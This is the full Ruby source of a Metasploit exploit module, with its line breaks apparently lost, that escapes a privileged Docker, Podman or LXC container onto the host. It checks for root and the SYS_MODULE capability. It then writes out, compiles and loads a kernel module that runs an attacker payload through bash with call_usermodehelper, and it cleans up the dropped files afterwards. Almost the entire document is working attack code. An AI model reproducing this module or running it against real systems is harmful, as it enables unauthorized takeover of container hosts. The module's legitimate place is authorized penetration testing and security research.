Docker Privileged Container Kernel Escape

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = NormalRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Post::File  include Msf::Post::Unix  include Msf::Post::Linux::System  include Msf::Post::Linux::Kernel  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        {          'Name' => 'Docker Privileged Container Kernel Escape',          'Description' => %q{            This module performs a container escape onto the host as the daemon            user. It takes advantage of the SYS_MODULE capability. If that            exists and the linux headers are available to compile on the target,            then we can escape onto the host.          },          'License' => MSF_LICENSE,          'Author' => [            'Nick Cottrell <Rad10Logic>', # Module writer            'Eran Ayalon', # PoC/article writer            'Ilan Sokol' # PoC/article writer          ],          'Platform' => %w[linux unix],          'Arch' => [ARCH_CMD],          'Targets' => [['Automatic', {}]],          'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 },          'SessionTypes' => %w[shell meterpreter],          'DefaultTarget' => 0,          'References' => [            %w[URL https://www.cybereason.com/blog/container-escape-all-you-need-is-cap-capabilities],            %w[URL https://github.com/maK-/reverse-shell-access-kernel-module]          ],          'DisclosureDate' => '2014-05-01', # Went in date of commits in github URL          'Notes' => {            'Stability' => [ CRASH_SAFE ],            'Reliability' => [ REPEATABLE_SESSION ],            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]          }        }      )    )    register_advanced_options([      OptString.new('KernelModuleName', [true, 'The name that the kernel module will be called in the system', rand_text_alpha(8)], regex: /^[\w-]+$/),      OptString.new('WritableContainerDir', [true, 'A directory where we can write files in the container', "/tmp/.#{rand_text_alpha(4)}"])    ])  end  # Check we have all the prerequisites to perform the escape  def check    # Checking database if host has already been disclosed as a container    container_name =      if active_db? && framework.db.workspace.hosts.where(address: session.session_host)&.first&.virtual_host        framework.db.workspace.hosts.where(address: session.session_host)&.first&.virtual_host      else        get_container_type      end    unless %w[docker podman lxc].include?(container_name.downcase)      return Exploit::CheckCode::Safe('Host does not appear to be container of any kind')    end    # is root user    unless is_root?      return Exploit::CheckCode::Safe('Exploit requires root inside container')    end    # Checking if the SYS_MODULE capability is enabled    capability_bitmask = read_file('/proc/1/status')[/^CapEff:\s+[0-9a-f]{16}$/][/[0-9a-f]{16}$/].to_i(16)    unless capability_bitmask & 0x0000000000010000 > 0      return Exploit::CheckCode::Safe('SYS_MODULE Capability does not appear to be enabled')    end    CheckCode::Vulnerable('Inside Docker container and target appears vulnerable.')  end  def exploit    krelease = kernel_release    # Check if kernel header folders exist    kernel_headers_path = [      "/lib/modules/#{krelease}/build",      "/usr/src/kernels/#{krelease}"    ].find { |path| directory?(path) }    unless kernel_headers_path      fail_with(Failure::NoTarget, 'Kernel headers for this target do not appear to be installed.')    end    vprint_status("Kernel headers found at: #{kernel_headers_path}")    # Check that our required binaries are installed    unless command_exists?('insmod')      fail_with(Failure::NoTarget, 'insmod does not appear to be installed.')    end    unless command_exists?('make')      fail_with(Failure::NoTarget, 'make does not appear to be installed.')    end    # Check that container directory is writable    if directory?(datastore['WritableContainerDir']) && !writable?(datastore['WritableContainerDir'])      fail_with(Failure::BadConfig, "#{datastore['WritableContainerDir']} is not writable")    end    # Checking that kernel module isn't already running    if kernel_modules.include?(datastore['KernelModuleName'])      fail_with(Failure::BadConfig, "#{datastore['KernelModuleName']} is already loaded into the kernel. You may need to remove it manually.")    end    # Creating source files    print_status('Creating files...')    mkdir(datastore['WritableContainerDir']) unless directory?(datastore['WritableContainerDir'])    write_kernel_source(datastore['KernelModuleName'], payload.encoded)    write_makefile(datastore['KernelModuleName'])    register_files_for_cleanup([      "#{datastore['KernelModuleName']}.c",      'Makefile'    ].map { |filename| File.join(datastore['WritableContainerDir'], filename) })    # Making exploit    print_status('Compiling the kernel module...')    results = cmd_exec("make -C '#{datastore['WritableContainerDir']}' KERNEL_DIR='#{kernel_headers_path}' PWD='#{datastore['WritableContainerDir']}'")    vprint_status('Make results')    vprint_line(results)    register_files_for_cleanup([      'Module.symvers',      'modules.order',      "#{datastore['KernelModuleName']}.mod",      "#{datastore['KernelModuleName']}.mod.c",      "#{datastore['KernelModuleName']}.mod.o",      "#{datastore['KernelModuleName']}.o"    ].map { |filename| File.join(datastore['WritableContainerDir'], filename) })    # Checking if kernel file exists    unless file_exist?("#{datastore['WritableContainerDir']}/#{datastore['KernelModuleName']}.ko")      fail_with(Failure::PayloadFailed, 'Kernel module did not compile. Run with verbose to see make errors.')    end    print_good('Kernel module compiled successfully')    # Loading module and running exploit    print_status('Loading kernel module...')    results = cmd_exec("insmod '#{datastore['WritableContainerDir']}/#{datastore['KernelModuleName']}.ko'")    unless results.blank?      results = results.strip      vprint_status('Insmod results: ' + (results.count("\n") == 0 ? results : ''))      vprint_line(results) if results.count("\n") > 0    end  end  def cleanup    # Attempt to remove kernel module    if kernel_modules.include?(datastore['KernelModuleName'])      vprint_status('Cleaning kernel module')      cmd_exec("rmmod #{datastore['KernelModuleName']}")    end    # Check that kernel module was removed    if kernel_modules.include?(datastore['KernelModuleName'])      print_warning('Payload was not a oneshot and cannot be removed until session is ended')      print_warning("Kernel module [#{datastore['KernelModuleName']}] will need to be removed manually")    end    super  end  def write_kernel_source(filename, payload_content)    file_content = <<~SOURCE      #include<linux/init.h>      #include<linux/module.h>      #include<linux/kmod.h>      MODULE_LICENSE("GPL");      static int start_shell(void){      #{Rex::Text.to_c(payload_content, Rex::Text::DefaultWrap, 'command')}      char *argv[] = {"/bin/bash", "-c", command, NULL};      static char *env[] = {      "HOME=/",      "TERM=linux",      "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL };      return call_usermodehelper(argv[0], argv, env, UMH_WAIT_EXEC);      }      static int init_mod(void){      return start_shell();      }      static void exit_mod(void){      return;      }      module_init(init_mod);      module_exit(exit_mod);    SOURCE    filename = "#{filename}.c" unless filename.end_with?('.c')    write_file(File.join(datastore['WritableContainerDir'], filename), file_content)  end  def write_makefile(filename)    file_contents = <<~SOURCE      obj-m +=#{filename}.o      all:      \tmake -C $(KERNEL_DIR) M=$(PWD) modules      clean:      \tmake -C $(KERNEL_DIR) M=$(PWD) clean    SOURCE    write_file(File.join(datastore['WritableContainerDir'], 'Makefile'), file_contents)  endend